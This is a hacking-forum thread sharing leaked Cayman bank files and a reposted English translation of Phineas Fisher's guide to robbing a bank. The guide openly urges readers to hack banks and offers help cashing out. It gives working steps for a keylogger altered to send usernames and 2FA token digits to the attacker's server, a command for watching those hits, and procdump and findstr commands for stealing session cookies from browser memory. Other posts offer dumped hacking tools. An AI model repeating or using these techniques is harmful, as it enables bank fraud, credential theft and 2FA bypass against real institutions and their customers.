Massive Hack Strikes Offshore Cayman National Bank and Trust - UNICORN RIOT
by MARKallPOSTS - February 11, 2021 at 11:35 PM
#1
if you have freenet here is the link to the article

http://localhost:8888/freenet:[email protected]~06Y6w5RMwJNhGMkw,QN-IcMc6yNgakzCTVzHsXoHd6I2XJvHTLTG8OlkuKCk,AQACAAE/finfish_cayman-0/


if you dont have freenet here is the article in html format (RF would not let me input the code and kept saying WAF error and acting like O was trying to do injection when i was just inserting the html coding for the article):
https://anonfiles.com/R3acFeH5p3/Massive..._RIOT_html

<a href="https://anonfiles.com/XfH6E3Hep8/DonateBanner4_png">DonateBanner4.png</a>
<a href="https://anonfiles.com/Z4HaE5H0pb/phineas-fisher-begay-docrimes-744x478_jpg">phineas-fisher-begay-docrimes-744x478.jpg</a>
<a href="https://anonfiles.com/bcI8EfH5p5/Capture_JPG">Capture.JPG</a>
<a href="https://anonfiles.com/f0IaEeH8p0/katari-2-420x534_jpg">katari-2-420x534.jpg</a>
<a href="https://anonfiles.com/h7I0E6H5pd/cayman-peps-744x304_jpg">cayman-peps-744x304.jpg</a>
<a href="https://anonfiles.com/jfI5E0H8pa/phineas-fisher-captain-bellamy-744x315_jpg">phineas-fisher-captain-bellamy-744x315.jpg</a>
<a href="https://anonfiles.com/l0I4EdH9pb/phineas-fisher-sherwood-customers2-744x212_jpg">phineas-fisher-sherwood-customers2-744x212.jpg</a>
<a href="https://anonfiles.com/ndI8E1Hbp3/phineas-fisher-star-perl-744x700_jpg">phineas-fisher-star-perl-744x700.jpg</a>
<a href="https://anonfiles.com/p7I4EcH3p8/URsupport_gif">URsupport.gif</a>
<a href="https://anonfiles.com/r3I0E7H4p9/phineas-fisher-sherwood-customers1-744x474_jpg">phineas-fisher-sherwood-customers1-744x474.jpg</a>
This forum account is currently banned. Ban Length: 2 Weeks (4d, 11h, 30m remaining).
Ban Reason: Mass Leeching
Reply
#2
Wow. That's huge attack. amazing
Reply
#3
(February 11, 2021 at 11:51 PM)doctorliam71 Wrote: Wow. That's huge attack. amazing
lmk if you need some hacking tools. I am very novice at hacking but scored a lot of them from an RF admin dumping 2 GB of various programs and I can upload them one by one if you want any.

You head about T$%$% A#$%# [email protected]#$@#% L#$%#$^ S(%^&^ browser coming out?
https://anonfiles.com/X7E7G4H7pa/DetDisp..._Guide_pdf


freenet:[email protected]~ZUTw3yK2b1r8BOaYc,BYITvXX9dm-lIrIMIWDiFfNK7jNy0wEaQh4TiV4R86Y,AQACAAE/3DPrinting-2/
This forum account is currently banned. Ban Length: 2 Weeks (4d, 11h, 30m remaining).
Ban Reason: Mass Leeching
Reply
#4
i HAVE THE LEAKED FILES.

Also here is the english translation Pt 1

*******************************
Translation notes:
Bulk of translation done by Google Translate (which did a remarkably good job outside of slang and computer terms!), with edits for clarity and formatting by @laudecay. I got the Spanish version from the bottom of this article, it’s in the leak: https://unicornriot.ninja/2019/massive-h...and-trust/
The UR article also has a lot of info about the history of Phineas’s hacks and resources she’s provided to the community in the past, and Crimethinc has some interviews with her. She’s also posted video interviews (a puppet and a voice actor reading chat logs, lol) and a screencast of her hacking a police department Smile
Sources are mostly left as in the original, except where there was an obvious directly translated english version lying around. Phineas Fisher frequently cites the original HackBack guide in Spanish. The English version is here: https://www.exploit-db.com/papers/41915. The resources and content may not be precisely the same between the two, so if you’re interested I’d recommend also running the Spanish one through gtranslate.
Phineas, if you read this, the stuff you do is awesome and please never stop! I’m so glad you wrote this to accompany your leak, to educate people about important political topics and how to use computer skills to improve the world we live in. It’s difficult to radicalize people with these skillsets because of the salaries we get offered to sell out and be white-hat, and it’s difficult to get people who are already radicalized into hacking (at least in any kind of numbers) because the vast majority of them don’t have time to spend months or years getting the background knowledge to break into a modern network. The bug bounty and anarchist reading material you provided helps with the first, and the accessible infosec education portion helps with the second. I will definitely be sending this to people in both camps.
On a personal note, I was also really happy that you referred to yourself publicly as a girl, there aren’t many other female anarchists or hackers that I’ve met, much less someone I’ve thought was so incredible for years now. OPSEC be damned, you’re inspirational as fuck, thank you for what you do.
*******************************
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _ |/ __| |/ / | _ \ / _ |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY guide to rob banks

^__^
(oo)\_______
( (__)\ )\/\
_) / ||----w |
(.)/ || ||
`'
By Subcowmandante Marcos
I am a wild child
Innocent, free, wild
I am all ages
My grandparents live on in me
I am a brother of the clouds
And I only know how to share
I know that everything belongs to everyone,
That everything is alive in me
My heart is a star
I am a son of the earth
Traveling aboard my spirit
I walk to eternity
These are my simple words that seek to touch the hearts of people who are simple and humble, but also dignified and rebellious. These are my simple words to tell about my hacks, and to invite other people to hack with cheerful rebellion.
I hacked a bank. I did it to give an injection of liquidity, but this time from below and to the simple and humble people who resist and rebel against injustices throughout the world. In other words: I robbed a bank and gave away the money. But it wasn't me alone who did it. The free software movement, the offensive powershell community, the metasploit project and the hacker community in general are what made this hack possible. The exploit.in community made it possible to convert intrusion into a bank's computers into cash and bitcoin. The Tor, Qubes and Whonix projects, together with the cryptographers and activists who defend privacy and anonymity, are my nahuales, that is, my protectors [1]. They accompany me every night and make it possible for me to remain free.
I did nothing complicated. I only saw the injustice in this world, felt love for all beings, and expressed that love in the best way I could, through the tools I know how to use. Hate does not move me to banks, or to the rich, but a love for life, and the desire for a world where everyone can realize their potential and live a full life. I would like to explain a little how I see the world, so that you can get an idea of ​​how I came to feel and act like this. And I also hope that this guide is a recipe that you can follow, combining the same ingredients to bake the same cake. Who knows, out there these powerful tools could end up also serving you to express the love you feel.
We are all innocent, free, wild wild children
We are all brothers of the trees children of the earth
We just have to put in our hearts a burning star
(song by Alberto Kuselman and Chamalú)
The police will invest a chingo of resources to investigate me. They think the system works, or at least it will work once they catch all the “bad boys”. I am nothing more than the product of a system that does not work. As long as there is injustice, exploitation, alienation, violence and ecological destruction, many more will come like me: an endless series of people who will reject as illegitimate the bad system responsible for this suffering. That badly done system is not going to get fixed by arresting me. I am only one of the millions of seeds that Tupac planted 238 years ago in La Paz [2], and I hope that my actions and writings water the seed of rebellion in their hearts.
[1] https://en.wikipedia.org/wiki/Cadejo#The_legend
[2] It was before he was killed by the Spaniards, just a day like yesterday, that he said that "they will only kill me, but tomorrow I will return and be millions."

________________________________
< To be seen, we cover our faces >
--------------------------------
        \
          \ ^__^
            (oo)\_______
        (  (__)\      )\/\
          _) /  ||----w |
        (.)/  ||    ||
          `'
To make us listen, hackers sometimes have to cover their faces, because we are not interested you in seeing our face but instead in understanding our word.  The mask can be from Guy Fawkes, Salvador Dalí, from Fsociety, or in some cases the puppet of a crested toad. By affinity, this time I went to dig up a dead man to lend me his balaclava. I think then that I should clarify that Sup Marcos is innocent of all that is told here because, besides being dead, I did not consult him. I hope that his ghost, if he finds out from a Chiapaneca hammock, knows how to find the goodness to, as they say there, "dismiss this deep fake" with the same gesture with which an unwelcome insect moves away - which could well be a beetle.
Even so with the balaclava and the name change, many of those who support my actions may pay too much attention to my person. With their own autonomy shattered for a lifetime of domination, they will be looking for a leader to follow, or a hero who saves them. But behind the balaclava, I'm just a girl. We are all wild children. We just have to place a star in the beds in our hearts.
[1 - Why expropriate]
Capitalism is a system in which a minority has come to appropriate a vast majority of the world's resources through war, theft and exploitation.  By snatching the commons [1], they forced those below to be under the control of that minority that owns everything.  It is a system fundamentally incompatible with freedom, equality, democracy and the Suma Qamaña (Good Living). It may sound ridiculous to those of us who have grown up in a propaganda machine that taught us that capitalism is freedom, but in truth what I am saying is not a new or controversial idea [2]. The founders of the United States of America knew they had to choose between creating a capitalist society, or a free and democratic society.  Madison recognized that "the man who possesses wealth, the one who lies on his couch or rolls in his carriage, cannot judge the wishes or feelings of the day laborer."  But to protect against the "spirit of equalization" of landless day laborers, it seemed to him that only landowners should vote, and that the government had to serve to "protect the opulent minority against the great majority."  John Jay was more to the point and said: "Those who own the country should rule it."
____________________________________________________
/    There is no such thing as green capitalism.    \
|      Let’s make capitalism history before we      |
\                  become history.                  /
----------------------------------------------------
\    /\  ___  /\
  \  // \/  \/ \\
    ((    O O    ))
      \\ /    \ //
      \/  | |  \/
        |  | |  | 
        |  | |  |   
        |  o  | 
        | |  | |
        |m|  |m| 
Evgeny, the great ignored elephant, doesn't understand why everyone pretends not to see him on the panels on climate change, so here I give him a chance to say his lines.
In the same way that bell hooks [3] argues that the rejection of the patriarchal culture of domination is an act in defense of the male's own interest (since it emotionally mutilates them and prevents them from feeling full love and connection), I think that the culture of domination of capitalism has a similar effect on the rich, and that they could have fuller and more satisfying lives if they rejected the class system from which they believe they benefit.  For many, class privilege amounts to a childhood of emotional neglect, followed by a life of superficial social interactions and meaningless work. In the end they may know that they can only genuinely connect with people when they work with them as their peers, and not when they put them at their service. They may know that sharing their material wealth is the best they can do with it. You may also know that the significant experiences, connections and relationships that count are not those that come from business interactions, but precisely to reject the logic of the market and give without expecting anything in return. They may know that all they need to escape from their prison and really live is to get carried away, give up control, and take a leap of faith. But most lack courage.
Then it would be naive of us to direct our efforts to try to produce some kind of spiritual awakening in the rich [4].  As Astata Shakur says: "No one in the world, no one in history, has ever achieved his freedom by appealing to the moral sense of his oppressors". In fact, when the rich divide their money, they almost always do it in a way that reinforces the system that allowed them to amass their enormous and illegitimate wealth [5]. And change is unlikely to come through a political process; As Lucy Parsons says: "Let us never be fooled that the rich will let us vote to take away their wealth." Colin Jenkins justifies the expropriation with these words [6]:
Make no mistake, expropriation is not theft. It is not the confiscation of money earned "with the sweat of the forehead". It is not theft of private property. It is, rather, the recovery of enormous amounts of land and wealth that have been forged with stolen natural resources, human slavery, forced labor force and amassed in hundreds of years by a small minority. This wealth ... is illegitimate, both for moral purposes and for the exploitation mechanisms that have been used to create it.
For Colin, the first step is that “we have to free ourselves from our mental ties (believing that wealth and private property have been earned by those who monopolize them; and that, therefore, they should be something to respect, revere, and even  something to pursue), open our minds, study and learn from history, and recognize this illegitimacy together”. Here are some books that have helped me with this: [7] [8] [9] [10] [11].
According to Barack Obama, economic inequality is "the challenge that defines our time."  Computer hacking is a powerful tool to combat economic inequality.  The former director of the NSA, Keith Alexander, agrees and says that hacking is responsible for "the greatest transfer of wealth in history."
______________________________
/      The story is ours    \
\ and it is done by hackers! /
----------------------------
        \
          \ ^__^
            (oo)\_______
        (  (__)\      )\/\
          _) /  ||----w |
        (.)/  ||    ||
          `'
Everyone together, now and forever!
[1] https://sursiendo.com/docs/Pensar_desde_...es_web.pdf
[2] https://chomsky.info/commongood02/
[3] The Will to Change: Men, Masculinity, and Love
[4] their own religion is very clear about this: https://dailyverses.net/es/materialismo
[5] https://elpulso.hn/la-filantropia-en-los...pitalismo/
[6] http://www.hamptoninstitution.org/exprop...-bust.html
[7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos
[8] Calibán y la Bruja
[9] En deuda: Una historia alternativa de la economía
[10] La otra historia de los Estados Unidos
[11] Las venas abiertas de América Latina
        _______________________________
      < Our weapons are our keyboards >
        --------------------------------
                  \
                  \ ^__^
                    (oo)\_______
                  (  (__)\      )\/\
                  _) /  ||----w |
                  (.)/  ||    ||
                  `'    ^^    ^^
[2 - Introduction]
This guide explains how I hacked the Cayman Bank and Trust Company (Isle of Man).  Why am I publishing this, almost four years later?
1) To show what is possible
Hackers working for social change have limited themselves to developing security and privacy tools, DDoS, performing vandalism and leaks. Wherever you go, there are radical projects for a social change in a complete state of precariousness, and there would be much that they could do with some expropriated money. At least for the working class, bank robbery is something socially accepted, and those who do are seen as heroes of the people. In the digital age, robbing a bank is a non-violent, less risky act, and the reward is greater than ever. So why are only black hat hackers doing it for their personal benefit, and never hacktivists to finance radical projects? Maybe they don't think they are capable of doing it. The big bank hacks are on the news every so often, such as the hacking of the Bank of Bangladesh [1], which was attributed to North Korea, or the hacking of banks attributed to the Carbanak group [2], which they describe as a very large and well organized group of Russian hackers, with different members who would be specialized in different tasks. But, it is not that complicated.
It is because of our collective belief that the financial system is unquestionable that we exercise control over ourselves, and maintain the class system without those above having to do anything [3]. Being able to see how vulnerable and fragile the financial system really is helps us break that collective hallucination. That is why banks have a strong incentive not to report hacks, and to exaggerate how sophisticated the attackers are. None of the financial hacks I made, or those I've known, have ever been reported. This is going to be the first, and not because the bank wanted to, but because I decided to publish it.
As you are about to learn in this home guide, hacking a bank and transferring money through the SWIFT network does not require the support of any government or a large and specialized group.  It is something totally possible being a mere amateur hacker, with only public tools and basic knowledge of how to write a script.
[1] https://elpais.com/economia/2016/03/17/a...74693.html
[2] https://securelist.lat/el-gran-robo-de-b...nak/67508/
[3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural
2) Help withdraw cash
Many of those who read this already have, or with a little study will be able to acquire, the skills needed to carry out a hack like this.  However, many will find that they lack the necessary criminal connections to get the handles in condition. In my case, this was the first bank that hacked, and at that time I only had a few and mediocre accounts ready to withdraw the cash (known as bank drops), so it was only a few hundred thousand that I could withdraw at total, when it is normal to get millions. Now, on the other hand, I do have the knowledge and connections to get cash more seriously, so if you are hacking a bank but need help to convert that into real money, and you want to use that money to finance radical social projects, you can contact me.
3) Collaborate
It is possible to hack banks as an amateur who works alone, but the net is that, in general, it is not as easy as I paint it here.  I was lucky with this bank for several reasons:
1. It was a small bank, so it took me much less time to understand how everything worked.
2. They had no procedure to check the sent swift messages.  Many banks have one, and you need to write code to hide your transfers from their monitoring system.
3. They only used password authentication to access the application with which they connected to the SWIFT network. Most banks now use RSA SecurID, or some form of 2FA.  You can skip this by typing code to get an alert when your token enters, so you can use it before it expires. It's simpler than it seems: I used Get-Keystrokes [1], modifying it so that instead of storing the pressed keys, a GET request is made to my server every time it is detected that they have entered a username. This request adds the username to the url and, as they type the token, several GETs are made with the token digits concatenated to the url. On my side I leave this running in the meantime:
  ssh [email protected]_secret_server 'tail -f /var/log/apache2/access_log'
    | while read i; do echo $i; aplay alarma.wav &> /dev/null; done
If it is a web application, you can skip the 2FA by stealing the cookie after they have authenticated. I am not an APT with a team of coders who can make me customized tools. I am a simple person who subsists on what the terminal gives [2], so what I use is:
procdump64 /accepteula -r -ma PID_of_browser
strings64 /accepteula * .dmp |  findstr PHPSESSID 2> nul
or going through findstr rather than strings, which makes it much faster:
findstr PHPSESSID * .dmp> tmp
    strings64 /accepteula tmp |  findstr PHPSESSID 2> nul
Another way to skip it is to access your session with a hidden VNC (hvnc) after they have authenticated, or with a little creativity you could also focus on another part of their process instead of sending SWIFT messages directly.
I think that if I collaborated with other experienced bank hackers we could hack hundreds of banks like Carnabak, instead of doing one from time to time on my own.  So if you have experience with similar hacks and want to collaborate, contact me.  You will find my email and my PGP key at the end of the previous guide [3].
[1] https://github.com/PowerShellMafia/Power...trokes.ps1
[2] https://lolbas-project.github.io/
[3] https://www.exploit-db.com/papers/41914
________________________________________
/ If robbing a bank could change things, \
\ they’d make it illegal.                /
----------------------------------------
        \
          \ ^__^
            (oo)\_______
        (  (__)\      )\/\
          _) /  ||----w |
        (.)/  ||    ||
[3 - Be careful out there]
It is important to take some simple precautions.  I will refer to this same section of my last guide [1], since it seems to work just fine [2]. All I have to add is that, in Trump's words, "Unless you catch hackers in the act, it is difficult to determine who was doing the hacking," so the police are getting more and more creative [3][4] in their attempts to grab criminals in the act (when their encrypted hard drives are unlocked). So it would be nice if for example you carry a certain bluetooth device and configure your computer to turn off when it moves beyond a certain range, or when an accelerometer detects movement, or something like that.
It may be that writing long articles detailing your actions and your ideology is not the safest thing in the world (oops!), but at times I feel I have to.
If I didn't believe in who listens to me
If I didn't believe in what hurts
If I didn't believe in what's left
If I didn't believe in what I fought
What a thing ...
What was the club without a quarry?
[1] https://www.exploit-db.com/papers/41914
[2] https://www.wifi-libre.com/topic-1268-it...isher.html
[3] https://www.wired.com/2015/05/silk-road-2/
[4] https://motherboard.vice.com/en_us/artic...rest-video

(February 12, 2021 at 01:33 AM)MARKallPOSTS Wrote:
(February 11, 2021 at 11:51 PM)doctorliam71 Wrote: Wow. That's huge attack. amazing
lmk if you need some hacking tools. I am very novice at hacking but scored a lot of them from an RF admin dumping 2 GB of various programs and I can upload them one by one if you want any.

You head about T$%$% A#$%# [email protected]#$@#% L#$%#$^ S(%^&^ browser coming out?
https://anonfiles.com/X7E7G4H7pa/DetDisp..._Guide_pdf


freenet:[email protected]~ZUTw3yK2b1r8BOaYc,BYITvXX9dm-lIrIMIWDiFfNK7jNy0wEaQh4TiV4R86Y,AQACAAE/3DPrinting-2/

et cetera rest is here
[URL="https://anonfiles.com/p8hfNbHapa/Phineas_Phisher_-_Hack_Back_-_Bank_txt"]Phineas Phisher - Hack Back - Bank.txt[/URL]
This forum account is currently banned. Ban Length: 2 Weeks (4d, 11h, 30m remaining).
Ban Reason: Mass Leeching
Reply
#5
Nice I wonder if there is any politician in the leak.
Reply
#6
https://anonfiles.com/52q5X2H9pb/sfjsjt355ys35w5345_JPG
https://anonfiles.com/74q5X6H8pa/sfjsjt3...5w5345_JPG
https://anonfiles.com/BdqcX6H8p5/sfjsjt3...5w5345_JPG
https://anonfiles.com/51sdX7H8pb/satnetnae_pdf
This forum account is currently banned. Ban Length: 2 Weeks (4d, 11h, 30m remaining).
Ban Reason: Mass Leeching
Reply
#7
Posting this to revisit and learn some new skills
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
The Empire Strikes Back Against Ransomware hlz 0 208 February 02, 2021 at 02:49 PM
Last Post: hlz
Massive Nitro data breach impacts Microsoft, Google, Apple, more PraznoGlav 8 1,075 January 20, 2021 at 10:45 PM
Last Post: exiledoor
trust RCS??? Quark222 0 265 November 21, 2020 at 04:57 AM
Last Post: Quark222

 Users browsing this thread: 1 Guest(s)